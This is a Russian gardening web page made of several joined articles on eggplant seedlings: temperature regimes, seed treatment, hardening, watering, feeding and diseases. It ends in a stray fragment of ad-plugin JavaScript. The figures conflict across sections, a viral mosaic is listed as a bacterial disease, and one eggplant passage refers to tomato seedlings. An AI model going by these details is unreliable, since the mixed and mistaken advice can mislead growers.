8 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

При какой температуре выращивать баклажаны

При какой температуре выращивать баклажаны

Баклажан прихотлив к окружающей среде, а также нуждается в наличии питательных веществ в грунте. Оптимальная температура рассады баклажанов позволяет вырастить здоровую культуру.

Температура выращивания баклажанов

Выбор семян для посадки

Первым делом обращают внимание на выбор семян баклажанов и подготавливают их к высадке.

Приобретение качественных семян — основа получения хорошего урожая. Приобретать посадочный материал лучше в специализированных заведениях.

Основные факторы выбора:

  1. Если вы предпочитаете приобретать семена на рынке, берите только у проверенных продавцов.
  2. Выбирая сорт для посева, отдавайте предпочтение тем растениям, которые были выведены для определенного климата. К примеру, гибриды, которые рекомендуют для выращивания в средней полосе, выдерживают незначительные перепады температур и повышения уровня влажности.
  3. Выбирая посадочный материал, обращайте внимание на целостность упаковки. Надрывы, выгорание цвета, потеки краски свидетельствуют о неправильном хранении семян.
  4. Следующим моментом является срок годности. Семена баклажан могут храниться в течение 5 лет. Но покупка более свежих увеличивает шанс на хорошие всходы.
  5. Покупка обработанных семян (гранулированных, глазированных, дражировочных, инкрустированных) является большим преимуществом, ведь специальная оболочка, появляющаяся вокруг семян, содержит большое количество различных веществ, которые способствуют быстрому прорастанию. Такой материал не нуждается в дополнительных обработках и обеззараживаниях.
  6. Покупать лучше несколько видов семян. В таком случае, шанс на появление хороших ростков увеличивается в разы.

Предварительная подготовка семян

Если заранее подготовить семена, можно ускорить процесс выращивания, провести профилактику различных заболеваний и получить максимально качественный и богатый урожай. Предпосадочная обработка включает в себя ряд мероприятий.

Калибровка и срок годности

Прежде всего сортируем семена по размеру, отделяем крупные от мелких. Это позволяет выращивать дружные всходы и больший урожай. Семена одинаковых размеров всходят и дают урожай одинаково по той причине, что в момент роста поглощается все большее количество питательных веществ, соответственно те, что всходят раньше, поглощают больше веществ, чем те, которые еще не взошли. Тем самым они затормаживают развитие других семян.

Считают, что надо выбрасывать мелкие семена и оставлять только крупные. Это миф, просто высаживайте семена примерно равные по размеру, так их проще выращивать.

Внимательно осматривайте материал. Идеальные для посадки семена имеют светлый бежевый цвет без отверстий и повреждений. Если зернышки имеют поврежденные места, пятна или непривычный окрас, отсеивайте их.

После визуального осмотра нужно проверить семенной материал на всхожесть. Чтобы убедится в том, что из них что-то вырастет, помещаем их в семенной раствор примерно на 10-15 минут. Те, которые останутся сверху — выбрасываем, оставшиеся подсушиваются и готовятся к следующему этапу.

Обеззараживание семян

Растения нуждаются в хорошем уходе

Прежде чем выращивать семена растения, продезинфицируйте их марганцовым раствором, дабы снизить вероятность появлений заболеваний или сделайте термическую обработку

Для дезинфекции вторым способом:

  1. Замачиваем в теплой (более 45°) воде на 10-15 минут.
  2. Высыпаем в холодную воду на пару минут.
  3. Помещаем в готовый раствор микроэлементов на 12 часов.
  4. Перемещаем в холодильник или другое холодное и сухое место на сутки и хорошо высушиваем.

Рецепт раствора, который заменит покупной: 2.5 гр. древесной золы развести в 0.5 л. воды. Если в арсенале нет золы, используйте нитрофоску. Эффективность домашнего раствора меньшая, но состав натуральный.

Основные требования к посадке

Чтобы баклажаны хорошо росли, им необходим плодородный участок земли и режим.

Они не выносят застоя влаги и тяжелый глинистый грунт. Главной необходимостью является воздушная, рыхловатая и питательная почва.

Не сажайте культуру в грядки, где до этого находились томаты, картофель и тому подобное, ведь их атакуют похожие заразы. Лучше выращивать рассаду после перца, огурцов, бобовых, дыни, тыквы. После них остается питательная среда — это касается и перца, не смотря на схожие заболевания с баклажаном.

Температура

Рекомендованный температурный режим для посадки баклажан -15-30°С. Овощи любят тепло и при температуре ниже 15°С росток теряет листья и может совсем испортиться, рекомендовано, чтобы температура при посадке поднималась до 30°С. Торопиться высаживать в теплицу или на открытое пространство не стоит, в средней российской полосе благоприятное время наступает в конце мая начале июля.

Уход за рассадой

После появления первых росточков корректируем температурный режим.

Днем от 23°С до 27°С, а ночью 14-18°С. Минимальные перепады необходимы для закаливания корневой системы будущего овоща.

Еще один плюс такого перепада — привыкание к низким температурам рассады, а отсюда велики шансы, что она не замерзнет и не пропадает, особенно при климате в нашей стране.

Дополнительные требования

Как правило, для стабильного роста и развития рассады не хватает естественного освещения. Правильнее всего применять фитолампы, но также подойдут и обычные люминесцентные лампы.

Дополнительное освещение требуется, чтобы ростки не вытягивались и не становились бледными и слабыми. Такое условие можно назвать профилактикой от различных заражений уже высаженной в открытый грунт рассаде.

Вторым дополнительным условием ухода рассады является подкормка.

Многие эксперты при необходимости рекомендуют следующие виды подкормки:

  • первая подкормка должна происходить без пикировки, а также на 7-10 день после возникновения всходов, а при использовании пикировки оптимальные дни — 10 и 11 9после проведения процедуры);
  • любые следующие подкормки применяются для стимулирования вегетации с интервалами в 7-10 дней.

Каждую подкормку совмещают с поливами, только так можно растить качественную рассаду.

Все процессы проводят от 50 до 70 дней и в итоге получают отличную рассаду для открытого участка земли.

Заключение

Температура для молодой рассады баклажан должна быть высокой, поэтому пересаживание обычно производят либо вечером с 17 до 20 часов, либо в пасмурный день. Также в первые недели необходимо каждый сеянец укрывать от прямых лучей солнечного света, для этого используют либо тепличную пленку, либо бумажные конусы-крышки.

Рассада баклажан: температура выращивания

Выращивание баклажанов – это очень трудоемкий процесс. Он требует от дачника конкретных знаний и умений. Только упорный труд поможет вырастить ему богатый урожай, на который он рассчитывает.

У каждого огородника непременно найдутся собственные секреты, которые он активно использует при выращивании рассады для баклажанов. Он должен точно знать, в каких условиях следует высаживать овощи, чтобы те хорошо росли и созревали. Особое внимание всегда следует уделять температурному режиму, в котором растения будут максимально комфортно себя чувствовать.

Оптимальная температура для баклажанов — от 22 до 28 градусов

Пренебрежение правилами высадки и ухода за баклажанами отразится на урожайности.

Вина за то, что на огороде выросло слишком мало овощей, будет лежать только на дачнике, который не сумел обеспечить хорошие условия для рассады.

Подходящая температура для высаживания рассады

Баклажаны, прежде чем дать плоды, проходят несколько стадий развития. На каждом из них растению требуется определенный уход, который касается не только регулярного полива, но и обеспечение правильного температурного режима.

Рассада баклажанов не будет нормально развиваться в слишком холодном или в жарком месте. Такой же реакции следует ожидать и от других подобных овощных культур.

Баклажаны относятся к числу тех растений, которые сильно любят тепло. Им крайне сложно переносить холодные периоды. Оптимальная температура для их рассады колеблется в пределах 18 градусов тепла. В такой среде она может спокойно разрастаться. В ночное время суток растения вполне способны справиться с небольшим похолоданием, примерно 15-16 градусов. Это для них является допустимой нормой.

В холодном месте рассада баклажанов желтеет

Вышеприведенные данные не являются точными. Они лишь дают возможность огородникам приблизительно понять, в каких условиях следует высаживать в открытый грунт баклажаны. В процессе работы с растениями требования касательно температурного режима могут незначительно меняться. И это вполне нормально.

Если огородник желает немного ускорить развитие рассады и рост самих растений, он может высадить их в более теплом месте, в котором продолжительное время наблюдается около 23-25 градусов тепла.

Не нужно бояться держать баклажаны в помещениях, где температура не слишком высокая. Небольшой холод наоборот пойдет овощной культуре на пользу. Он поможет закалить растение, сделать его более устойчивым к непредсказуемым заморозкам и многим болезням.

Всходы баклажанов можно закалять

Для закаливания рассады баклажаны необходимо поместить в место, где удерживается температура в 12-14 градусов. Ни в коем случае не ниже.

Теплолюбивые растения не будут нормально реагировать на сильный холод. Он не даст им вовремя начать развиваться. Не исключен факт того, что баклажаны просто погибнут в таких условиях. Такой результат от закаливания точно не порадует овощеводов. Так что к данной процедуре следует относиться с особой тщательности, чтобы не обернуть ее во вред растениям.

Имеет смысл начинать закаливать баклажаны сразу же после появления первых всходов. В этот период процедура будет наиболее эффективной.

Она не только повысит устойчивость рассады к заморозкам, но и позволит ей быстрее адаптироваться к условиям открытого грунта, когда подойдет момент пересаживать ее в подготовленную землю.

Нежелательно, чтобы рассада сильно перерастала до высадки

Перегревать баклажаны перед посадкой в грунт не стоит. Из-за этого рассада станет чересчур изнеженной. Она будет тяжело переносить любые работы, которые придется проделывать при посадке. Растение не приспособится к обычной почве и может завянуть или же не дать положенный урожай.

При какой температуре растут баклажаны

Баклажаны не станут нормально расти и вовремя созревать, если будут испытывать недостаток тепла или наоборот ощущать постоянный перегрев. И холод, и сильная жара одинаково вредны для овощной культуры. И это одна из многочисленных причин, почему огородник должен обеспечивать своему участку, где выращиваются баклажаны, подходящий температурный режим.

Высадка в грунт производится, когда ночные температуры превысят +15 градусов

Баклажаны, как и остальные теплолюбивые растения, прекращают свой рост, когда температура опускается ниже 15 градусов тепла. Это заставляет их сидеть в земле.

Овощи ни за что не начнут расти в столь непригодных для этого условиях. Если случились заморозки, и на протяжении нескольких дней держится похолодание (ниже 10 градусов тепла), то рассада баклажан погибнет. Вряд ли дачник уже сможет ее спасти, если заранее не предпримет меры по защите от неблагоприятной погоды.

Когда баклажаны начинают замерзать, происходит следующее:

  • Сок перестает нормально циркулировать по стеблю растения.
  • Корневая система постепенно замирает от того, что постоянно находится в прохладной земле.
  • Листья баклажанов из-за недостатка питательных веществ начинают отмирать, из-за чего ухудшается общее состояние растения.

Допускать появление приведенных выше признаков ни в коем случае нельзя. Растение после такого сложно реабилитировать. Если же огородник все-таки успеет спасти баклажаны, то вряд ли они в дальнейшем порадуют его хорошей урожайностью.

В холодной почве куст баклажана может погибнуть

Активно идет рост баклажанов, если они выращиваются в тепле. 24-28 градусов в солнечную погоду и 18-22 градуса в пасмурный день – это идеальные условия для овощей.

Баклажаны могут пострадать даже в солнечную погоду, если на улице будет наблюдаться сильный сквозняк. Листочки этих растений очень нежные. Поэтому прохладные порывы ветра могут серьезно травмировать их. Чтобы такого не произошло, необходимо подбирать для высадки баклажанов хорошее тихое место без сквозняков или строить для них дополнительное укрытие от ветра.

Низкую температуру баклажаны выносят только в первую неделю после появления всходов. Они вполне комфортно себя чувствуют в условиях 10-12 градусов в ночное время и 16-18 градусов тепла днем.

В последующие периоды, когда баклажаны войдут в активную фазу роста, им потребуется много тепла. Неразумно поступают дачники, которые выдерживают растения в прохладе в эти периоды. Закаливанием следовало заниматься в более раннее время. Сейчас же эта процедура принесет им только вред.

Пленочное укрытие от холода

Обеспечение правильного температурного режима

Дачники, которые не первый год выращивают на своем участке баклажаны, уже знают, в какое время эффективнее всего начинать посадочные работы. Новички в этом деле могут спросить совета у опытных огородников. Они подскажут, какой период наиболее благоприятен для баклажанов. Но на самом деле не стоит полагаться на природу. Погода очень изменчива. И даже в мае, когда наступает сезон посадки рассады баклажан, могут наступить сильные заморозки, которые моментально погубят неокрепшие растения. Дачники должны быть заранее готовы к подобным непредвиденным обстоятельствам, чтобы лишний раз не рисковать урожаем.

В теплице баклажаны дают гарантированный урожай

Огородники, которые опасаются непредвиденных заморозков, предпочитают сажать баклажаны в теплицах. Такие условия являются самыми оптимальными. Дачник сможет самостоятельно регулировать температурный режим в парнике.

Баклажаны в теплице

Выращивание баклажанов в теплице имеет свои нюансы, на которые следует обращать внимание. Если огородник не будет своевременно поливать растения, проветривать парник и соблюдать прочие рекомендации по уходу, то овощи завянут. Если в теплице будет слишком жарко, то и это принесет им вред. Проветривание поможет выпустить лишнее тепло. Но не следует допускать сквозняков. Подробнее об этой проблеме было рассказано немного выше.

Баклажаны в открытом грунте

Не каждый дачник располагает таким сооружением, как теплица. К тому же, многие предпочитают выращивать овощи не в парниках, а в открытом грунте, считая данный метод более надежным и проверенным. Если огородник не посадил баклажаны в теплицу, это не значит, что ему не удастся защитить их от резкого наступления холодов. Для таких случаев тоже найдется эффективное решение.

Огороднику, который желает защитить свой участок от заморозков, понадобится пленка больших размеров и крепежные элементы, позволяющие зафиксировать ее.

Баклажаны страдают от сильной жары. Их надо притенять

Эти минимальные затраты способны обезопасить теплолюбивые растения. Пленка поможет создать временную теплицу, в которой баклажаны переждут холодный период. Ее следует растянуть над грядками и закрепить специальными колышками или другими подобными приспособлениями. Особенно такое укрытие актуально в ночное время, когда на улице становится очень прохладно. Днем можно открывать пленку, давая баклажанам возможность почувствовать тепло солнечных лучей.

Правильный температурный режим – это первое, что необходимо обеспечить баклажанам на всех стадиях роста.

Ведь именно тепло позволяет овощам активно созревать. Поэтому огородник, рассчитывающий на богатую урожайность, в первую очередь должен защитить грядки от такого врага, как холод.

6 важных правил ухода за баклажанами

Добавление статьи в новую подборку

Баклажаны – довольно капризная культура, поэтому при их выращивании нужно не только соблюдать главные принципы ухода, но и учитывать все тонкости. Мы подготовили для вас свод правил, которые должен знать каждый огородник, культивирующий это растение.

Так как в средней полосе России баклажаны в основном выращивают в теплице или под пленочным укрытием, в этой статье мы приведем советы по уходу за растениями, находящимися в защищенном грунте.

1. Правильный полив баклажанов

Грамотный полив – это уже половина успеха. Баклажанам нужно больше влаги, чем перцам. Поэтому не забывайте об этом, особенно если вы выращиваете две культуры в одном парнике. Корни баклажанов слабее, в результате чего они плохо транспортируют влагу к побегам. А при ее недостатке завязи и цветки опадают.

Баклажаны нужно поливать регулярно, но с количеством воды важно не переусердствовать

Но это не значит, что растения нужно заливать, в частности, сразу после посадки рассады. После «переезда» в парник растения поливают спустя 5 дней: в первые дни им хватает воды, так как рассаду сажают в предварительно политые лунки.

Регулярность полива баклажанов зависит от погоды. В облачные дни, когда земля долго остается слегка увлажненной, полив производят раз в 7-10 дней. А в знойную и засушливую погоду – раз в 3-5 дней.

При этом следует учесть, что баклажаны поливают только под корень (нельзя, чтобы листья намокали) и в утреннее время. При этом температура воды должна быть 25-28°С: при более низкой цветение задерживается.

После полива теплицу рекомендуется проветривать, чтобы не повышалась влажность воздуха.

2. Рыхление и окучивание

Недостаточно просто увлажнить почву, после каждого полива ее нужно рыхлить. Вокруг молодых растений – на глубину 4-5 см, во время появления бутонов и цветков – на 5-6 см, а после завязывания плодов – на 7-8 см. Глубже 8 см рыхлить не стоит, так как у баклажанов поверхностная корневая система, которую легко повредить.

Кроме того, после каждого рыхления растения окучивают на 5-7 см. Благодаря этому корни лучше дышат, влага дольше сохраняется в грунте, а сорняки замедляют свой рост.

Не забывайте своевременно рыхлить почву и окучивать баклажаны

3. Температурный режим

Наиболее оптимальная температура воздуха для баклажанов – 28-30°С. Но ничего страшного, если в теплице будет даже выше 35°С. А вот при опускании столбика термометра ниже 13°С растения перестают развиваться.

Чтобы контролировать температуру воздуха, установите в теплице 2 термометра: один – под крышей, а второй – прямо над поверхностью земли. Их показатели не должны отличаться более чем на 3°С.

Следите, чтобы температура воздуха в парнике была не менее 13 градусов

Если температура воздуха стремительно растет (а это особенно опасно в первые 3 дня после посадки рассады), ее необходимо снизить. Для этого нужно проветрить теплицу, затенить форточки и полить дорожки между грядками.

4. Формировка баклажанов

У большинства баклажанов побеги очень хрупкие, они легко ломаются под тяжестью плодов, поэтому сразу же после высадки рассады в грунт ее нужно подвязать к заранее вкопанному колышку.

Также можно установить шпалеру или натянуть проволоку над рядами кустов

Штамбовые компактные сорта подвязывать не нужно: у них более крепкие стебли, которые не достигают высокого роста.

Баклажаны не обязательно пасынковать, однако нужно своевременно удалять желтые листья и деформированные плоды. Также необходимо учесть, что нижние побеги, которые не плодоносят, могут оказаться полезными: в жару они защитят землю от пересыхания.

По поводу того, стоит ли прищипывать баклажаны, единого мнения нет. Вообще эти нежные растения лучше не травмировать, иначе они рискуют заболеть. Но если в конце сезона на кустах много очень цветков, верхушки можно прищипнуть и удалить слабые побеги, оставив на кусте 5-7 самых развитых. Это ускорит созревание плодов, которые вырастут весьма крупными.

Если же вы хотите полакомиться многочисленными, но некрупными баклажанами, то лучше обойтись без прищипки.

5. Подкормка баклажанов

При выращивании баклажанов за сезон проводят 3-4 подкормки

Первую подкормку рассады баклажанов проводят примерно через 2 недели после посадки. Важно, чтобы растения успели прижиться. При этом используют любое комплексное удобрение (например, Кемиру-люкс или Растворин).

Во время появления бутонов баклажаны подкармливают фосфорными и калийными удобрениями. Для этого 1 ст.л. сульфата калия и 1,5 ст.л. аммиачной селитры растворяют в 10 л воды, полученной жидкостью поливают растения, затем слегка рыхлят землю и насыпают туда гранулы суперфосфата – по 1 ч.л. под каждый куст.

Когда появятся первые плоды, растения подкармливают азотно-фосфорным удобрением. Используют 1,5 ст.л. амофоски на 10 л воды. Также во время цветения и плодоношения можно применять растворы коровяка, птичьего помета, древесной золы.

За 3-4 недели до сбора урожая под каждый куст баклажана рекомендуется вылить по 1 стакану питательного раствора, который готовят из 1 ст.л. суперфосфата, 1 ст.л. калийной соли и 10 л воды.

6. Защита от болезней

В целях профилактики опасных заболеваний соблюдайте следующие правила:

  • не допускайте перепад температур в теплице, а также сильного переувлажнения воздуха и почвы;
  • соблюдайте севооборот: баклажаны нельзя сажать каждый год в одну и ту же землю;
  • обрабатывайте растения фунгицидами.

Что же делать, если не удалось уберечь баклажаны от болезней? С недугами обычно справляются традиционными способами. От фитофтороза помогут такие препараты, как Консенто, Антракол или Квадрис, от серой гнили – Хорус или тот же Антракол.

Так выглядит некротическая пятнистость листьев баклажана

Однако вирусные болезни (например, табачную мозаику и некроз плодов) невозможно вылечить с помощью химических препаратов. В этом случае поможет только грамотная профилактика.

Ухаживайте за баклажанами правильно – и никакие болезни не будут вашим растениям страшны!

При какой температуре выращивать рассаду баклажан

Баклажан – это травянистое растение с довольно крупными листьями. Плоды баклажана съедобны, в широком распространении имеют темно-синий, фиолетовый окрас, реже встречаются сорта с желтым и белесым оттенком. Баклажаны содержат в себе множество полезных микроэлементов и витаминов.

Родом баклажан из южной части Индии, славящейся своим тропическим климатом. Данная культура не признает резких перепадов температур, холодных порывистых ветров. Она погибает при таких условиях, не пощадив труды сельских работников. Так как данная овощная культура очень капризна, перед ее разведением необходимо тщательно изучить вопрос о том, при какой температуре выращивать рассаду баклажан, чтобы она принесла здоровый и полноценный урожай.

Влияние внешних температурных факторов на срок посева семян на рассаду

Учитывая особенности нашего климата, биологи советуют полностью перейти на выращивание баклажан рассадным методом. По статистике, от посева до созревания плодов проходит около четырех месяцев, а именно от 95 до 135 дней. Если имеется возможность пересадить рассаду баклажан в теплицу в мае, то готовить семена к посадке можно уже в феврале, а при отсутствии данных условий – в середине марта.

Несмотря на то, что грунт в теплице к маю месяцу уже достигнет оптимального температурного режима в дневные часы, пересадка в него может нести угрозу для рассады в случае ночных похолоданий.

Необходимым условием к высадке зрелой рассады баклажан в открытый грунт является полностью прогретая почва, а именно до 22˚С. Это условие зачастую не может быть соблюдено по причине переменчивого климата нашей страны. Поэтому во избежание риска гибели, наученные многолетним опытом, огородники советуют выращивать данную культуру в закрытых тепличных условиях повсеместно.

Создание комфортных температурных условий для посадки семян

Так как баклажан считается самым теплолюбивым овощем, то огородникам, выращивающим эту культуру, необходимо следить за соблюдением условий для успешного созревания полноценных и здоровых плодов.

Считается, что чем раньше взойдут посаженые семена баклажан, тем лучше будет дальнейшее их развитие. По средним меркам, первые прорастания семян можно наблюдать на десятые сутки, но для того, чтобы ускорить этот процесс, рекомендуется при посадке предварительно замочить сухие семена. Это делается с целью подготовки семян к скорейшему созреванию. Замачивать семена необходимо в водной среде, температура которой должна составлять не менее 27˚С. В случае соблюдения рекомендации посевной материал взойдет не позже чем через 6 дней.

Некоторые садоводы проводят процедуру закаливания сухих семян перед посевом. Для этого оставляют их днем, не накрытыми при температуре 20˚С, а на ночь выносят в холодные помещения с температурой 6-7˚С тепла. Непосредственно сам посев производится в прогретую влажную почву, температура которой должна быть не менее чем 24˚С.

Для того чтобы посаженые семена быстрее развивались и появились первые всходы, почву необходимо накрыть пленкой. Для комфортного развития будущей рассады баклажан температура в данном самодельном парнике должна составлять не менее 26˚С.

Поливать посаженый материал под пленкой нельзя. Так как посадка производится уже во влажную, утепленную почву, первый полноценный полив должен быть произведен не ранее, чем через 6 суток (т. е. после первых всходов семян). Под пленкой рекомендуется лишь слегка увлажнять верхний слой грунта. Если в парнике почва будет переувлажнена, при постоянной температуре в 25˚С, семена погибнут, не успев взойти.

Значение температурного режима при первых всходов семян

Если до первых всходов семян дневной свет не играл большой роли для их развития, то после первых всходов нужно переместить будущую рассаду на освещаемый солнечным светом подоконник. Баклажаны очень требовательны к освещению. По возможности это должна быть южная сторона.

Перед первым поливом после всходов семян воду необходимо отстоять и прогреть до температуры 30 градусов. Данной инструкции следует придерживаться еще около 3 суток. Далее, температуру воды можно постепенно уменьшать (но вода не должна быть холодной!) и сокращать количество поливов. По истечении третьих суток, поливы можно осуществлять раз в 2-3 дня.

В будущем, после высадки рассады в открытый грунт или теплицу, совершать поливы тоже следует исключительно теплой водой. Обычно садоводы ставят ведра с водой на солнечное место, чтобы прогреть жидкость.

Нельзя ставить рассаду баклажан вблизи с обогревающими приборами. Влажность почвы в сочетании с повышенной температурой воздуха, может привести к недомоганию и даже гибели первых всходов рассады баклажан.

Дождавшись первых всходов можно убрать пленку, которая ранее служила парником. После этого, внешняя температура для будущей рассады снизится до 22-24˚С.

Если в месте хранения посевов температура не достигает вышеупомянутых границ, это не составляет большой опасности. По исследованию биологов, первые всходы прекрасно могут существовать и при более низкой температуре (но не менее 17˚С тепла). Небольшая прохлада позволит рассаде закалиться, что положительно отражается в будущем, а именно при пересадке саженцев в открытый грунт.

Закаливание

Самое эффективное время для закаливания теплолюбивых баклажан – это время первых всходов. Если забыть этот нюанс и опоздать с закаливанием при появлении первых всходов, то лучше воздержаться от данной процедуры в более поздние периоды развития рассады.

Закаливание первых ростков

Маленькие ростки уже могут комфортно существовать даже при температуре 15˚С, что является исключением для остальных периодов развития рассады.

Закаливание проводится с целью повышения устойчивости растений к неблагоприятным внешним факторам:

  • Внезапные перепады температуры;
  • Нестабильный световой день;
  • Заболевания.

Закаливание рассады баклажан начинают постепенно. В первый день изменение (понижение) внешней температуры создают на несколько часов. Затем длительность процедуры увеличивают с каждым днем.

Процедура закаливания длится до момента начала активного роста рассады. В этот период развития рассада баклажан особенно нуждается в тепле.

Учитывая то, что баклажаны теплолюбивы, необходимо правильно подготовить их корневую систему к жизни в открытом грунте после пикировки. Температура почвы даже в июне значительно отличается от комфортной температуры внутри емкостей для рассады.

Закаливание рассады перед пикировкой

Подготовку рассады перед пересадкой на новое, постоянное место, оптимально начинать за 10 дней. Подготовка проводится методом закаливания с целью ознакомления рассады с возможными переменчивыми природными и погодными условиями.

Рассаду необходимо вынести на балкон, где на нее будет попадать прямой солнечный свет. Температура воздуха на балконе должна быть не ниже 10 градусов тепла. Можно на несколько минут открывать окно для проветривания, чтобы рассада могла ощущать движение воздушных масс.

За 2-3 дня до окончательной пикировки, рассаду баклажан можно предварительно транспортировать в теплицу. Теплым днем рассаду разрешается держать на открытом воздухе под прямыми солнечными лучами.

Ни в коем случае нельзя перегревать рассаду баклажан перед пикировкой. Иначе возникнут трудности с адаптацией в новых условиях существования.

Огородники отмечают, что закаленная рассада намного лучше приживается на новом месте (в открытом грунте) и быстрее дает урожай, чем рассада, которую не закаливали. Многолетние наблюдения огородников и статистические исследования в данной области свидетельствуют о важности и полезности проведения процедуры закаливания рассады баклажан.

Влияние светового дня на развитие посевного материала

Как правило, овощам, родина которых обладает тропическим климатом, благоприятны короткие световые дни. Соответственно, для нормального роста и развития рассады баклажан, необходимо создать для нее условия ощущения короткого светового дня.

Поэтому зимой и ранней весной для рассады баклажан необходимо организовать искусственное подсвечивание. Если говорить о зимнем февральском месяце, подсветку можно включать уже к двум часам дня, так как естественного света рассаде баклажан будет не хватать уже после полудня.

Следует заметить, что естественное увеличение светового дня в апреле не может негативно сказаться на рассаде баклажан, так как она же в полной мере сформирована и готова к некоторым внешним переменам.

Выбор основного места для рассады баклажан

Опытные огородники всегда выбирают для баклажан самое солнечное и безветренное место на своем участке. Необходимо выбрать такой участок земли, который бы максимально освещало солнце, прогревая почву для рассады баклажан. Если земляной участок будет находиться в тени, он не будет достаточно прогрет для комфортного развития рассады. Недостаточно высокая температура почвы может привести к приостановке роста рассады, а также к опадению цветков и завязей.

К сожалению, природа устроена так, что ветер или сильный сквозняк могут существенно навредить баклажанам. Если на садовом участке нет такого безопасного места, необходимо соорудить самодельную конструкцию, которая бы защищала растения от порывов даже летнего теплого ветра.

Огородники, наученные многолетним опытом, советуют сажать по периметру участка с баклажанами такие культуры, как кукуруза и фасоль, способные защитить рассаду баклажан от ветра, и даже инфекций. Главное следить за тем, чтобы данные насаждения не затеняли участок с баклажанами и пропускали на него солнечный свет.

Последствия неблагоприятной температуры для рассады баклажан

В любой стадии созревания и роста рассады ей необходима комфортная температура. Если садовод-любитель пренебрежет советом замачивать семена в теплой воде, они могут не созреть и не взойти вообще.

Если же при первых всходах не позаботиться о закаливании будущей рассады, можно получить изнеженные отростки. При пересадке в грунт, они очень тяжело проходят адаптацию. Одна часть таких саженцев слабо развивается, долго не дает плоды. Другая часть заболевает ввиду слабого иммунитета при переселении в недостаточно утепленный открытый грунт. А самые слабые экземпляры гибнут в первые дни после пикировки.

В том случае, если огородник не позаботится о комфортном существовании растений в теплом, солнечном и безветренном месте и не подготовит специальный участок земли на участке, рассада также не порадует его ни количеством, ни качеством плодов.

Если синоптики прогнозируют холодное, ветреное и дождливое лето необходимо высадить рассаду в теплицу, в ином случае саженцы просто замерзнут и не дадут урожай. По многолетним наблюдениям биологов замечено, что холодным летом рассада баклажан чаще всего страдает от заболеваний. Недуги имеют как грибковую, так и вирусную природу происхождения. Холодным летом баклажаны растут очень медленно и приносят мелкие по размеру плоды. Это считается нормой.

Вирусные заболевания

Самым распространенным заболеванием рассады баклажан, имеющим вирусную природу, является «Вирусный внутренний некроз». Возникает оно при переизбытке влаги. Это касается как почвенной влаги, так и излишней влажности воздуха. Развивается данное заболевание достаточно быстро, при запущенной форме урожай может сократиться до 35%. Заболевание плодоносной рассады трудно не заметить. На плодах начинают появляться участки отмирающих тканей характерного бурого цвета.

Бактериальные заболевания

Одним из недугов бактериального происхождения является заболевание под названием «Черная пятнистость». Возникает пятнистость в условиях повышенной влажности почвы в сочетании с высокой температурой в дневные часы. В жаркое лето, когда температура в тени достигает до 38˚С, при обильных поливах, данного заболевания рассаде помидор избежать практически невозможно.

Неопытные огородники, жалея растения в столь высокие температуры, начинают увеличивать объем и частоту поливов. Этого делать категорически нельзя!

Черная пятнистость является заразным заболеванием, которое может поразить значительную часть здоровых саженцев. На растениях проявляется в виде пятен темного цвета. Когда болезнь прогрессивна, инфекция переносится на плоды. Зараженные плоды баклажан отличаются наличием на себе затемненных глянцевых пятен.

Другим заболеванием, вызванным бактериальной природой, является «Вирусная мозайка». Чаще всего встречается в южных регионах. Проявляется изменением окраса листьев и их формы. В прогрессирующей форме заболевания, листва начинает деформироваться и приобретает специфический окрас в темную полоску.

Заключение

Итак, для того чтобы вырастить здоровый урожай баклажанной культуры, необходимо обеспечить ее теплом, достаточным количеством света (но не более 12 часов в день), а также беречь от ветра, сквозняков и переувлажнения почвы.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
